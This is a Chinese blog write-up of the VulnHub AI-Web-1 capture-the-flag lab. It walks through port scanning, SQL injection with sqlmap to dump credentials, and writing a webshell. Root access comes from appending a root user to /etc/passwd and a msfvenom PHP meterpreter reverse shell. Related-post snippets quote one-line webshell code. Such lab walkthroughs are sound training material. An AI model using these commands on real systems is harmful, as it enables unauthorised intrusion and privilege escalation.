【VulnHub系列】AI-Web-1 漏洞提权

最新推荐文章于 2023-06-05 18:15:29 发布
最新推荐文章于 2023-06-05 18:15:29 发布
阅读量610 收藏 1
点赞数
分类专栏: VulnHub系列 文章标签: mysql 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/107304180
版权

一、环境

靶机: https://www.vulnhub.com/entry/ai-web-1,353/
攻击机: kali

二、具体步骤

2.1 主机发现

nmap -sP ip段

2.2 端口服务扫描

nmap -sV -A -p- 192.168.47.152

Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
| http-robots.txt: 2 disallowed entries 
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
|_http-title: AI Web 1.0

Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

2.3 网站目录扫描

直接 http://192.168.47.152/ 这样去爆破,没有什么结果!!!

2.3.1 查看 robots.txt

在这里插入图片描述
发现两个目录:

/m3diNf0/
/se3reTdir777/uploads/

2.3.2 分别拿去目录扫描探测

/m3diNf0/info.php
/se3reTdir777/index.php
/se3reTdir777/index.php/login/

在这里插入图片描述
在这里插入图片描述
整理有用信息

1、通过 php探针 知道网站物理路径:	/home/www/html/web1x443290o2sdf92213
2、发现有个可以查询的界面,下一步猜测是否存在注入

2.4 检测注入

输入 1    正常;
输入 1'   报错;
输入 1‘#  正常;

所以是存在注入的!

在这里插入图片描述

2.4.1 用sqlmap跑下吧(比较懒!!!)

用 BurpSuite 截取到包后保存在一个文件里
例如:
在这里插入图片描述

爆破数据库: sqlmap -r post --dbs

available databases [2]:
[*] aiweb1
[*] information_schema

爆破表:  sqlmap -r post -D aiweb1 --tables

Database: aiweb1
[2 tables]
+------------+
| user       |
| systemUser |
+------------+

爆破 user表: 
Table: user
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| id        | int(11)     |
| firstName | varchar(25) |
| lastName  | varchar(25) |
+-----------+-------------+

爆破 systemUser表: 
Table: systemUser
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(50) |
| userName | varchar(25) |
+----------+-------------+

爆破 user 表数据: sqlmap -r post -D aiweb1 -T user -C firstName,lastName --dump
Database: aiweb1
Table: user
[3 entries]
+-----------+----------+
| firstName | lastName |
+-----------+----------+
| admin     | admin    |
| root      | root     |
| mysql     | mysql    |
+-----------+----------+

爆破 systemUser 表数据: sqlmap -r post -D aiweb1 -T systemUser -C id,password,userName --dump

Database: aiweb1
Table: systemUser
[3 entries]
+------+----------------------------------------------+-----------+
| id   | password                                     | userName  |
+------+----------------------------------------------+-----------+
| 3    | TjB0VGhpczBuZUFsczA=                         | u3er      |
| 1    | RmFrZVVzZXJQYXNzdzByZA==                     | t00r      |
| 2    | TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== | aiweb1pwn |
+------+----------------------------------------------+-----------+

base64 解密:
t00r :RmFrZVVzZXJQYXNzdzByZA== (FakeUserPassw0rd)
aiweb1pwn :TXlFdmlsUGFzc19mOTA4c2RhZjlfc2FkZmFzZjBzYQ== (MyEvilPass_f908sdaf9_sadfasf0sa)
u3er :TjB0VGhpczBuZUFsczA= (N0tThis0neAls0)

**这里小结一下: ** 上面爆破的东西没什么用,拿去尝试登入,是错的密码!!!

2.4.2 利用 sqlmap 获取shell

1、尝试读取 /etc/passwd

sqlmap -r post file_read="/etc/passwd"
没有读到!!!

2、写入webshell
通过 sqlmap写入一句话:(这里方法有很多,就举一个吧!)
参考:sqlmap写入 --file-write --file-dest 写入一句话
其他还可以利用 sqlmap的 --os-shell 和 mysql语句写入等。。。

sqlmap -r post --file-write="hack.php"  --file-dest="/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php"

菜刀连接:
http://192.168.47.152/se3reTdir777/uploads/shell.php

在这里插入图片描述
发现可以查看 /etc/passwd 但是sqlmap没爆出来,奇怪!!!
无法访问 root 目录,所以还得提权!!!

2.5 提权

前提:发现 www-data 用户对 /etc/passwd 有写权限!!!

添加个 root 权限用户: 例如 插入用户: inseone  密码: passtest
perl -le 'print crypt("passtest","salt")'
echo "inseone:sabE5x7epbUlE:0:0:hacker:/root:/bin/bash" >> /etc/passwd

在这里插入图片描述
菜刀里不支持 su 命令…
在这里插入图片描述

2.5.1 利用 msf 里的 meterpreter 模块里的shell终端

1、生成 php 木马
msfvenom -a php php/meterpreter/reverse_tcp LHOST=kali_ip LPORT=4444 -f raw > webshell.php

2、通过菜刀上传到前面一句话木马那个目录下

在这里插入图片描述
在kali上监听反弹shell :
在这里插入图片描述

1、 进入终端: shell
2、交互式终端: python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

至此,关于 AI:Web:1 的题解已完毕!

初学者L_言
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录一次vulnhubAI-WEB-1.0靶场复现
sszsNo1的博客
06-24 183
又得到俩个路径,再次扫描路径后有没有其他的目录,首先扫描/m3diNf0/目录。发现访问/se3reTdir777/uploads/时出现跟上面一样,于是我就尝试访问/se3reTdir777/输入4时,却发现没有次用户,根据上面的回显说明数据库有三个用户,接下来判断闭合。先访问/index.html目录,发现跟没扫之前一样。访问/m3diNf0/目录时,说没有权限,换下一个。接着访问另一个,发现跟上面一样,信息搜集就到这了。再访问另外一个,又出现俩个目录,接着访问。访问一下,结果发现什么都没有。
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2139
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 896
vulnhub ai-web1.0
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 3972
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
vulnhubAI-Web-1.0
m_de_g的博客
04-27 601
linux
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
06-25
人工智能-数据挖掘-Web数据挖掘算法研究.pdf
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。第1页 共25页
人工智能-数据挖掘-基于WEB日志的数据挖掘.pdf
06-25
人工智能-数据挖掘-基于WEB日志的数据挖掘.pdf
人工智能-数据挖掘-基于WEB的数据挖掘研究.pdf
06-25
人工智能-数据挖掘-基于WEB的数据挖掘研究.pdf
AI人工智能-《整除》.pptx
11-14
AI人工智能-《整除》.pptx
SQL注入写入文件方法(获取webshell)
Goodric的博客
04-08 2423
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
上传漏洞-一句话木马
Coisini的博客
05-30 8353
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容: 一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
SELinux 初探
邓永坚的blog
12-03 1万+
SELinux 初探 在進入了 CentOS 5.x 之後,SELinux 已經是個非常完備的核心模組了!CentOS 5.x 提供了很多管理 SELinux 的指令與機制, 因此在整體架構上面比以前的版本要單純且容易操作管理!所以,在這一版以後,我們建議大家千萬不要關掉 SELinux 這玩意兒! 讓我們來仔細的玩玩這傢伙吧! 什麼是 SELinux 什麼是 S
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)
热门推荐
小水池
07-27 2万+
本质 : windows平台 中国菜刀 支持asp、php、asp.net和jsp等 可能被IDS、AV、WAF、扫描器软件发现查杀 使用方法: 往目标web服务器上传相应的一句话木马 asp一句话木马: <%execute(request("pass"))%> php一句话木马: <?php @eval($_POS
利用sqlmap和蚁剑进行简单的渗透测试和挂小马操作
dbabs的博客
01-24 567
利用sqlmap进行文件上传和简单的渗透测试
远程控制——一句话木马
Coffilater的博客
11-13 6460
两个物理机要连在同一个子网,都采用桥接方式 普通用户有很多权限限制,所以要用root权限 默认打开目录是在var/www/html 所以直接在该目录下创建shell.php文件 http默认端口为80,如果是别的端口,要在后面加上端口确定的号码 nmap扫描端口是否开放 apach 开放 service apache2 start 开放端口 在Kali Linxu中使用默认端口打开Apache服务 开放之后再扫描,可以看到端口已经开放 http://192.168.43.7
vulnhub渗透系列之DC(一) :内含suid的三种提权方法
来到了学渣的博客
01-25 2925
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决 2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框 架,版本是7.x但不确定是哪个x 3.利用searchsp...
Web的基本漏洞--提权
最新发布
尽欢的博客
06-05 379
提权的介绍
MSF模拟渗透测试之一句话木马拿shell
lza20001103的博客
04-08 3697
MSF模拟渗透测试之一句话木马拿shell
如何利用CVE-2021-39617漏洞给安卓提权
02-27
很抱歉,我不能回答如何利用漏洞来攻击系统或提权,因为这涉及到安全问题和非法活动。作为一个AI语言模型,我的使命是为人类提供有益的信息和知识,并帮助他们更好地了解技术和其他相关领域。因此,我鼓励所有用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值